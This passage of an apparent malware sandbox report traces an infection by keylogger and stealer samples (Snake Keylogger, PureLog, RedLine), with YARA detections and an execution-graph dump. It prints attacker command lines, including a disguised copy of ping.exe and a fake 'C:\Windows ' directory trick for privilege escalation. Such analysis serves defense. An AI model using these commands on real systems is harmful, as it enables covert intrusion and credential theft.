                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:14
                                                                                                                Start time:02:24:49
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.00000000260EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                Reputation:moderate
                                                                                                                Has exited:false

                                                                                                                Target ID:15
                                                                                                                Start time:02:24:49
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:16
                                                                                                                Start time:02:24:54
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:18
                                                                                                                Start time:02:24:56
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:19
                                                                                                                Start time:02:24:57
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:20
                                                                                                                Start time:02:24:57
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\xpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                Imagebase:0x380000
                                                                                                                File size:18'944 bytes
                                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Has exited:true

                                                                                                                Target ID:21
                                                                                                                Start time:02:24:59
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\Cobsfhiy.PIF
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\Public\Libraries\Cobsfhiy.PIF"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'297'920 bytes
                                                                                                                MD5 hash:DC614075998696B44ADA8A2EED23FC03
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 63%, ReversingLabs
                                                                                                                Has exited:true

                                                                                                                Target ID:23
                                                                                                                Start time:02:25:00
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000001.1460585249.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000002.2505730658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                Target ID:24
                                                                                                                Start time:04:03:08
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\Cobsfhiy.PIF
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\Public\Libraries\Cobsfhiy.PIF"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'297'920 bytes
                                                                                                                MD5 hash:DC614075998696B44ADA8A2EED23FC03
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Has exited:true

                                                                                                                Target ID:26
                                                                                                                Start time:04:03:10
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000002.2505611445.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000001.1548998614.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                Target ID:27
                                                                                                                Start time:04:03:12
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:28
                                                                                                                Start time:04:03:17
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:29
                                                                                                                Start time:04:03:17
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true


Execution Graph

Execution Coverage:16.1%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:30.1%
Total number of Nodes:1649
Total number of Limit Nodes:19
2b147ec 11 API calls 37430->37431 37432 2b28fe4 37431->37432 37433 2b289d0 20 API calls 37432->37433 37434 2b28fff 37433->37434 37435 2b14860 11 API calls 37434->37435 37436 2b29044 37435->37436 37437 2b147ec 11 API calls 37436->37437 37438 2b29069 37437->37438 37439 2b289d0 20 API calls 37438->37439 37440 2b29084 37439->37440 37441 2b14860 11 API calls 37440->37441 37442 2b2909d 37441->37442 37443 2b147ec 11 API calls 37442->37443 37444 2b290c5 37443->37444 37445 2b289d0 20 API calls 37444->37445 37446 2b290e3 37445->37446 37447 2b14860 11 API calls 37446->37447 37448 2b290ff 37447->37448 37449 2b147ec 11 API calls 37448->37449 37450 2b29130 37449->37450 37451 2b289d0 20 API calls 37450->37451 37452 2b29154 37451->37452 37453 2b14860 11 API calls 37452->37453 37454 2b29170 37453->37454 37455 2b147ec 11 API calls 37454->37455 37456 2b291a1 37455->37456 37457 2b289d0 20 API calls 37456->37457 37458 2b291c5 37457->37458 37459 2b14860 11 API calls 37458->37459 37460 2b291e1 37459->37460 37461 2b147ec 11 API calls 37460->37461 37462 2b29212 37461->37462 37463 2b289d0 20 API calls 37462->37463 37464 2b29236 37463->37464 37820 2b28788 37464->37820 37467 2b292e8 37468 2b14860 11 API calls 37467->37468 37470 2b29304 37468->37470 37469 2b14860 11 API calls 37471 2b29293 37469->37471 37472 2b147ec 11 API calls 37470->37472 37473 2b147ec 11 API calls 37471->37473 37474 2b29335 37472->37474 37475 2b292c4 37473->37475 37476 2b289d0 20 API calls 37474->37476 37477 2b289d0 20 API calls 37475->37477 37478 2b29359 37476->37478 37477->37467 37479 2b289d0 20 API calls 37478->37479 37480 2b2938c 37479->37480 37481 2b14860 11 API calls 37480->37481 37482 2b293a8 37481->37482 37483 2b147ec 11 API calls 37482->37483 37484 2b293d9 37483->37484 37485 2b289d0 20 API calls 37484->37485 37486 2b293fd 37485->37486 37487 2b14860 11 API calls 37486->37487 37488 2b29419 37487->37488 37489 2b147ec 11 API calls 37488->37489 37490 2b2944a 37489->37490 37491 2b289d0 20 API calls 37490->37491 37492 
2b2946e 37491->37492 37493 2b12ee0 2 API calls 37492->37493 37494 2b29473 37493->37494 37495 2b14860 11 API calls 37494->37495 37496 2b294b6 37495->37496 37497 2b147ec 11 API calls 37496->37497 37498 2b294e7 37497->37498 37499 2b289d0 20 API calls 37498->37499 37500 2b2950b 37499->37500 37501 2b14860 11 API calls 37500->37501 37502 2b29527 37501->37502 37503 2b147ec 11 API calls 37502->37503 37504 2b29558 37503->37504 37505 2b289d0 20 API calls 37504->37505 37506 2b2957c 37505->37506 37507 2b14860 11 API calls 37506->37507 37508 2b29598 37507->37508 37509 2b147ec 11 API calls 37508->37509 37510 2b295c9 37509->37510 37511 2b289d0 20 API calls 37510->37511 37512 2b295ed GetThreadContext 37511->37512 37512->37396 37513 2b2960f 37512->37513 37514 2b14860 11 API calls 37513->37514 37515 2b2962b 37514->37515 37516 2b147ec 11 API calls 37515->37516 37517 2b2965c 37516->37517 37518 2b289d0 20 API calls 37517->37518 37519 2b29680 37518->37519 37520 2b14860 11 API calls 37519->37520 37521 2b2969c 37520->37521 37522 2b147ec 11 API calls 37521->37522 37523 2b296cd 37522->37523 37524 2b289d0 20 API calls 37523->37524 37525 2b296f1 37524->37525 37526 2b14860 11 API calls 37525->37526 37527 2b2970d 37526->37527 37528 2b147ec 11 API calls 37527->37528 37529 2b2973e 37528->37529 37530 2b289d0 20 API calls 37529->37530 37531 2b29762 37530->37531 37532 2b14860 11 API calls 37531->37532 37533 2b2977e 37532->37533 37534 2b147ec 11 API calls 37533->37534 37535 2b297af 37534->37535 37536 2b289d0 20 API calls 37535->37536 37537 2b297d3 37536->37537 37538 2b14860 11 API calls 37537->37538 37539 2b297ef 37538->37539 37540 2b147ec 11 API calls 37539->37540 37541 2b29820 37540->37541 37542 2b289d0 20 API calls 37541->37542 37543 2b29844 37542->37543 37832 2b28400 37543->37832 37546 2b29878 37549 2b14860 11 API calls 37546->37549 37547 2b29b7f 37548 2b14860 11 API calls 37547->37548 37551 2b29b9b 37548->37551 37550 2b29894 37549->37550 37553 2b147ec 11 API calls 37550->37553 37552 2b147ec 11 
